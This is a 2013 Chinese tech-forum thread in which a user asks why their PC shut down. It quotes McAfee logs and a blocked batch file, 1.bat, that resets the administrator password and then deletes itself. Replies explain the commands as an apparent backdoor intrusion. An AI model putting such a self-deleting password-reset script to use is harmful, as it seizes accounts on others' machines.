win7论坛

Win7 64位旗舰版下载 系统 工具 主题

论坛汇聚Win7系统下载 激活工具 主题

Win7系统下载|主题|优化|桌面|激活|小白必读

Win8.1论坛

Win8.1 系统下载 中文版 平板电脑 主题

Win8.1 平板电脑 中文版 系统下载尽在Win8论坛

Windows8.1下载|主题|激活|新手宝典|必备软件

Win10论坛

Win10 正式版 系统 下载 主题 平板

重定义Modern UI,打造完美Windows全新体验

Windows10下载|安装|新手宝典|必备软件

远景论坛 - 微软极客社区 › 论坛 › Microsoft 微软产品主题论坛 › Windows系统安全与杀毒 > 上百度搜索，突然被关机，查到一条命令，请诸位帮解释一 ...

返回列表发表新帖

查看: 18166|回复: 18

上百度搜索，突然被关机，查到一条命令，请诸位帮解释一下意思 [复制链接]
电梯直达
复制

Rank: 2 Rank: 2

UID: 226718
帖子: 452
PB币: 1544
贡献: 0
技术: 1
活跃: 326

楼主

发表于 2013-1-30 07:13:00 IP属地广西 |只看该作者 |倒序浏览

本机装vista系统，麦咖啡杀软，上百度搜索：卡饭上不了了，就突然关机，查看日记发现内容：2013/1/30 6:36:31 已由访问保护规则禁止 hd69-PC\Administrator C:\Windows\SysWOW64\svchost.exe C:\Program Files\1.bat 防病毒最大保护:禁止 Svchost 执行非 Windows 可执行文件已阻止的操作: 执行2013/1/30 6:36:31 已由访问保护规则禁止 NT AUTHORITY\SYSTEM C:\Windows\system32\mfevtps.exe C:\Program Files\Common Files\McAfee\SystemCore\vtp_catcache 通用标准保护:禁止修改 McAfee 文件和设置已阻止的操作: 写入
1.bat内容是：net user administrator chaonima999
@del %0
请诸位帮分析一下，谢谢！

Rank: 2 Rank: 2

UID: 632636
帖子: 299
PB币: 322
贡献: 0
技术: 0
活跃: 0

沙发

发表于 2013-1-30 18:16:45 IP属地四川 |只看该作者

是不是中毒了，有没有杀毒查过，不过麦咖啡有的病毒查不到

Rank: 1

UID: 1007766
帖子: 57
PB币: 841
贡献: 0
技术: 129
活跃: 29

板凳

发表于 2013-1-30 19:19:26 IP属地辽宁 |只看该作者

hacker 扫描肉鸡扫到你了，估计你中招了

Rank: 7 Rank: 7 Rank: 7

UID: 674320
帖子: 1232
PB币: 12688
贡献: 0
技术: 15
活跃: 245

4^F

发表于 2013-2-9 00:26:16 IP属地广东 |只看该作者

哈哈。。。。

Rank: 1

UID: 2886657
帖子: 8
PB币: 23
贡献: 0
技术: 0
活跃: 10

5^F

发表于 2013-2-13 13:14:46 IP属地上海 |只看该作者

有可能啊！中招了！

Rank: 5 Rank: 5 Rank: 5

UID: 2756015
帖子: 596
PB币: 594
贡献: 0
技术: 0
活跃: 276

6^F

发表于 2013-2-14 16:42:10 IP属地浙江 |只看该作者

C:\Windows\SysWOW64\svchost.exe，不存在这个东西。你中招了。

Rank: 2 Rank: 2

UID: 226718
帖子: 452
PB币: 1544
贡献: 0
技术: 1
活跃: 326

7^F

发表于 2013-2-15 11:29:45 IP属地广西 |只看该作者

谢谢诸位的帮忙

Rank: 1

UID: 2799709
帖子: 41
PB币: 140
贡献: 0
技术: 0
活跃: 46

8^F

发表于 2013-2-19 10:16:18 IP属地辽宁 |只看该作者

sysWOW64是六十四位系统 net user administrator z是想在你的电脑创建管理员帐户楼主您绝对中招了

Rank: 1

UID: 3537702
帖子: 5
PB币: 2
贡献: 0
技术: 0
活跃: 0

9^F

发表于 2013-2-21 22:36:50 IP属地浙江 |只看该作者

我只是来赚几份的,别误会

Rank: 1

UID: 3446129
帖子: 33
PB币: 458
贡献: 0
技术: 0
活跃: 1

10^F

发表于 2013-2-24 09:35:39 IP属地广东 |只看该作者

管理员权限删除什么！看不懂！

Rank: 1

UID: 677015
帖子: 41
PB币: 2
贡献: 0
技术: 0
活跃: 5

11^F

发表于 2013-2-28 12:25:27 IP属地广西 |只看该作者

LZ 快转移艳照吧...

Rank: 17

UID: 923981
帖子: 13918
PB币: 20299
贡献: 0
技术: 11
活跃: 1031

12^F

发表于 2013-3-1 08:17:59 IP属地广东 |只看该作者

1.bat内容是：net user administrator chaonima999

这条命令很可能是给入侵者创建一个后门账户以便继续入侵，综合来看，楼主你很可能已中招。

接下来该怎么做不用我说了吧……

Rank: 1

UID: 2904159
帖子: 95
PB币: 36
贡献: 0
技术: 0
活跃: 14

13^F

发表于 2013-3-1 15:23:17 IP属地山西 |只看该作者

看不懂.路过

Rank: 1

UID: 652935
帖子: 3
PB币: 76
贡献: 0
技术: 0
活跃: 0

14^F

发表于 2013-3-10 11:02:19 IP属地未知 |只看该作者

svchost.exe这个是系统文件一般进程里有3-5个很正常是有木马强行修改svchost.exe文件被咖啡阻止出现关机保护||......

Rank: 7 Rank: 7 Rank: 7

UID: 3038511
帖子: 712
PB币: 2654
贡献: 0
技术: 1
活跃: 47

15^F

发表于 2013-3-12 12:37:24 IP属地江苏 |只看该作者

net user administrator chaonima999 把administrator的密码改为 chaonima999
@del %0 删除自身 @del ---执行删除命令并且不显示命令窗口 %0--- 自身的路径

Rank: 2 Rank: 2

UID: 803863
帖子: 352
PB币: 686
贡献: 0
技术: 1
活跃: 62

16^F

发表于 2013-3-12 21:41:19 IP属地宁夏 |只看该作者

学习了……

Rank: 1

UID: 3600240
帖子: 8
PB币: 11
贡献: 0
技术: 0
活跃: 0

17^F

发表于 2013-3-15 14:43:38 IP属地江苏 |只看该作者

麦咖啡还是很不错的。

魔の右手

Rank: 7 Rank: 7 Rank: 7

UID: 641116
帖子: 337
PB币: 234
贡献: 0
技术: 1
活跃: 99

18^F

发表于 2013-3-15 20:42:08 IP属地福建 |只看该作者

zchw2002 发表于 2013-2-14 16:42
C:\Windows\SysWOW64\svchost.exe，不存在这个东西。你中招了。

这东西存在的....64位系统目录下有这个哦
感觉楼主的Administrator被人恶意修改了密码，然后被人shutdown -s -t 0了（大学的时候机房里经常干这样的坏事），攻击形式有点像“流光”。（是像哦...不是“是”）

Rank: 2 Rank: 2

UID: 1284613
帖子: 176
PB币: 856
贡献: 0
技术: 0
活跃: 22

19^F

发表于 2013-3-16 21:21:07 IP属地河北 |只看该作者

net user administrator chaonima999修改管理员帐户Adminstrator的密码为chaonima999……
@del %0 删除文件自身，即1.bat

返回列表发表新帖

回顶部

Copyright (C) 2005-2024 pcbeta.com, All rights reserved
Powered by Discuz! 苏ICP备17027154号 CDN加速及安全服务由「快御」提供
请勿发布违反中华人民共和国法律法规的言论，会员观点不代表远景论坛官方立场。
远景在线 | 远景论坛 | 苹果论坛 | Win11论坛 | Win10论坛 | Win8论坛 | Win7论坛 | WP论坛 | Office论坛